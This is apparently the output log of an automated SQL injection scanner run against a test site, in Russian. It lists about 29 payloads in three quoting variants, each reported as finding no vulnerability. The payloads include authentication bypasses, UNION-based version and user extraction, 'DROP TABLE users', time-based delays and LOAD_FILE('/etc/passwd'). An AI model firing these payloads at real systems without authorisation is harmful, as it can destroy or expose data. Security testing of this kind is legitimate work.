POST (одинарные кавычки): Нет уязвимости с payload: '' OR '1'='1' -- | Время: 1.16s
POST (одинарные кавычки): Нет уязвимости с payload: '" OR "1"="1 | Время: 1.01s
POST (одинарные кавычки): Нет уязвимости с payload: '' UNION SELECT NULL, NULL -- | Время: 1.02s
POST (одинарные кавычки): Нет уязвимости с payload: '' UNION SELECT @@version, user() -- | Время: 0.95s
POST (одинарные кавычки): Нет уязвимости с payload: ''; DROP TABLE users; -- | Время: 1.12s
POST (одинарные кавычки): Нет уязвимости с payload: '" OR 1=1 -- | Время: 1.23s
POST (одинарные кавычки): Нет уязвимости с payload: '' AND (SELECT COUNT(*) FROM users) > 0 -- | Время: 1.11s
POST (одинарные кавычки): Нет уязвимости с payload: '' OR EXISTS(SELECT * FROM users WHERE username='admin') -- | Время: 1.13s
POST (одинарные кавычки): Нет уязвимости с payload: '' AND 1=2 UNION SELECT NULL, @@version -- | Время: 0.93s
POST (одинарные кавычки): Нет уязвимости с payload: ''; -- | Время: 1.09s
POST (одинарные кавычки): Нет уязвимости с payload: '' OR 'x'='x | Время: 1.40s
POST (одинарные кавычки): Нет уязвимости с payload: '' AND SLEEP(5) -- | Время: 1.01s
POST (одинарные кавычки): Нет уязвимости с payload: '' || '1'='1 | Время: 0.99s
POST (одинарные кавычки): Нет уязвимости с payload: ' OR 1=1 | Время: 1.01s
POST (одинарные кавычки): Нет уязвимости с payload: ' OR 1=1 -- | Время: 0.98s
POST (одинарные кавычки): Нет уязвимости с payload: ' OR 1=1# | Время: 1.18s
POST (одинарные кавычки): Нет уязвимости с payload: ' AND 1=0 UNION SELECT @@version -- | Время: 1.00s
POST (одинарные кавычки): Нет уязвимости с payload: '" OR "1"="1 | Время: 1.05s
POST (одинарные кавычки): Нет уязвимости с payload: '" UNION SELECT NULL, NULL -- | Время: 1.08s
POST (одинарные кавычки): Нет уязвимости с payload: '" AND 1=0 UNION SELECT @@version -- | Время: 0.92s
POST (одинарные кавычки): Нет уязвимости с payload: '' ORDER BY 999 -- | Время: 1.19s
POST (одинарные кавычки): Нет уязвимости с payload: '' GROUP BY 1 -- | Время: 1.23s
POST (одинарные кавычки): Нет уязвимости с payload: '' HAVING 1=1 -- | Время: 0.99s
POST (одинарные кавычки): Нет уязвимости с payload: '' AND EXTRACTVALUE(0, CONCAT(0x5c, USER())) -- | Время: 1.03s
POST (одинарные кавычки): Нет уязвимости с payload: '' UNION SELECT LOAD_FILE('/etc/passwd') -- | Время: 1.09s
POST (одинарные кавычки): Нет уязвимости с payload: '' || pg_sleep(5) -- | Время: 1.16s
POST (одинарные кавычки): Нет уязвимости с payload: ''; WAITFOR DELAY '0:0:5' -- | Время: 0.97s
POST (одинарные кавычки): Нет уязвимости с payload: '' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) -- | Время: 1.12s
POST (двойные кавычки): Нет уязвимости с payload: "' OR '1'='1 | Время: 0.99s
POST (двойные кавычки): Нет уязвимости с payload: "' OR '1'='1' -- | Время: 1.02s
POST (двойные кавычки): Нет уязвимости с payload: "" OR "1"="1 | Время: 1.26s
POST (двойные кавычки): Нет уязвимости с payload: "' UNION SELECT NULL, NULL -- | Время: 0.97s
POST (двойные кавычки): Нет уязвимости с payload: "' UNION SELECT @@version, user() -- | Время: 1.02s
POST (двойные кавычки): Нет уязвимости с payload: "'; DROP TABLE users; -- | Время: 1.31s
POST (двойные кавычки): Нет уязвимости с payload: "" OR 1=1 -- | Время: 1.05s
POST (двойные кавычки): Нет уязвимости с payload: "' AND (SELECT COUNT(*) FROM users) > 0 -- | Время: 1.36s
POST (двойные кавычки): Нет уязвимости с payload: "' OR EXISTS(SELECT * FROM users WHERE username='admin') -- | Время: 0.99s
POST (двойные кавычки): Нет уязвимости с payload: "' AND 1=2 UNION SELECT NULL, @@version -- | Время: 1.05s
POST (двойные кавычки): Нет уязвимости с payload: "'; -- | Время: 1.17s
POST (двойные кавычки): Нет уязвимости с payload: "' OR 'x'='x | Время: 1.93s
POST (двойные кавычки): Нет уязвимости с payload: "' AND SLEEP(5) -- | Время: 1.29s
POST (двойные кавычки): Нет уязвимости с payload: "' || '1'='1 | Время: 1.11s
POST (двойные кавычки): Нет уязвимости с payload: " OR 1=1 | Время: 1.21s
POST (двойные кавычки): Нет уязвимости с payload: " OR 1=1 -- | Время: 1.27s
POST (двойные кавычки): Нет уязвимости с payload: " OR 1=1# | Время: 1.50s
POST (двойные кавычки): Нет уязвимости с payload: " AND 1=0 UNION SELECT @@version -- | Время: 1.28s
POST (двойные кавычки): Нет уязвимости с payload: "" OR "1"="1 | Время: 1.27s
POST (двойные кавычки): Нет уязвимости с payload: "" UNION SELECT NULL, NULL -- | Время: 1.09s
POST (двойные кавычки): Нет уязвимости с payload: "" AND 1=0 UNION SELECT @@version -- | Время: 1.12s
POST (двойные кавычки): Нет уязвимости с payload: "' ORDER BY 999 -- | Время: 1.10s
POST (двойные кавычки): Нет уязвимости с payload: "' GROUP BY 1 -- | Время: 1.19s
POST (двойные кавычки): Нет уязвимости с payload: "' HAVING 1=1 -- | Время: 1.32s
POST (двойные кавычки): Нет уязвимости с payload: "' AND EXTRACTVALUE(0, CONCAT(0x5c, USER())) -- | Время: 1.11s
POST (двойные кавычки): Нет уязвимости с payload: "' UNION SELECT LOAD_FILE('/etc/passwd') -- | Время: 1.46s
POST (двойные кавычки): Нет уязвимости с payload: "' || pg_sleep(5) -- | Время: 1.16s
POST (двойные кавычки): Нет уязвимости с payload: "'; WAITFOR DELAY '0:0:5' -- | Время: 1.22s
POST (двойные кавычки): Нет уязвимости с payload: "' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) -- | Время: 1.11s
POST (без кавычек): Нет уязвимости с payload: ' OR '1'='1 | Время: 1.28s
POST (без кавычек): Нет уязвимости с payload: ' OR '1'='1' -- | Время: 1.34s
POST (без кавычек): Нет уязвимости с payload: " OR "1"="1 | Время: 1.13s
POST (без кавычек): Нет уязвимости с payload: ' UNION SELECT NULL, NULL -- | Время: 1.25s
POST (без кавычек): Нет уязвимости с payload: ' UNION SELECT @@version, user() -- | Время: 1.13s
POST (без кавычек): Нет уязвимости с payload: '; DROP TABLE users; -- | Время: 1.03s
POST (без кавычек): Нет уязвимости с payload: " OR 1=1 -- | Время: 1.11s
POST (без кавычек): Нет уязвимости с payload: ' AND (SELECT COUNT(*) FROM users) > 0 -- | Время: 1.05s
POST (без кавычек): Нет уязвимости с payload: ' OR EXISTS(SELECT * FROM users WHERE username='admin') -- | Время: 1.94s
POST (без кавычек): Нет уязвимости с payload: ' AND 1=2 UNION SELECT NULL, @@version -- | Время: 1.08s
POST (без кавычек): Нет уязвимости с payload: '; -- | Время: 1.41s
POST (без кавычек): Нет уязвимости с payload: ' OR 'x'='x | Время: 1.10s
POST (без кавычек): Нет уязвимости с payload: ' AND SLEEP(5) -- | Время: 1.27s
POST (без кавычек): Нет уязвимости с payload: ' || '1'='1 | Время: 1.52s
POST (без кавычек): Нет уязвимости с payload: OR 1=1 | Время: 1.04s
POST (без кавычек): Нет уязвимости с payload: OR 1=1 -- | Время: 1.08s
POST (без кавычек): Нет уязвимости с payload: OR 1=1# | Время: 1.20s
POST (без кавычек): Нет уязвимости с payload: AND 1=0 UNION SELECT @@version -- | Время: 1.06s
POST (без кавычек): Нет уязвимости с payload: " OR "1"="1 | Время: 1.23s
POST (без кавычек): Нет уязвимости с payload: " UNION SELECT NULL, NULL -- | Время: 1.09s
POST (без кавычек): Нет уязвимости с payload: " AND 1=0 UNION SELECT @@version -- | Время: 0.95s
POST (без кавычек): Нет уязвимости с payload: ' ORDER BY 999 -- | Время: 1.00s
POST (без кавычек): Нет уязвимости с payload: ' GROUP BY 1 -- | Время: 1.00s
POST (без кавычек): Нет уязвимости с payload: ' HAVING 1=1 -- | Время: 1.13s
POST (без кавычек): Нет уязвимости с payload: ' AND EXTRACTVALUE(0, CONCAT(0x5c, USER())) -- | Время: 1.10s
POST (без кавычек): Нет уязвимости с payload: ' UNION SELECT LOAD_FILE('/etc/passwd') -- | Время: 0.96s
POST (без кавычек): Нет уязвимости с payload: ' || pg_sleep(5) -- | Время: 0.97s
POST (без кавычек): Нет уязвимости с payload: '; WAITFOR DELAY '0:0:5' -- | Время: 1.19s
POST (без кавычек): Нет уязвимости с payload: ' AND DBMS_PIPE.RECEIVE_MESSAGE('a',5) -- | Время: 1.19s
=== ИТОГИ ПРОВЕРКИ ===
Всего проверено payloads: 41
Найдено уязвимостей: 0
URL проверен: https://web.test.ru/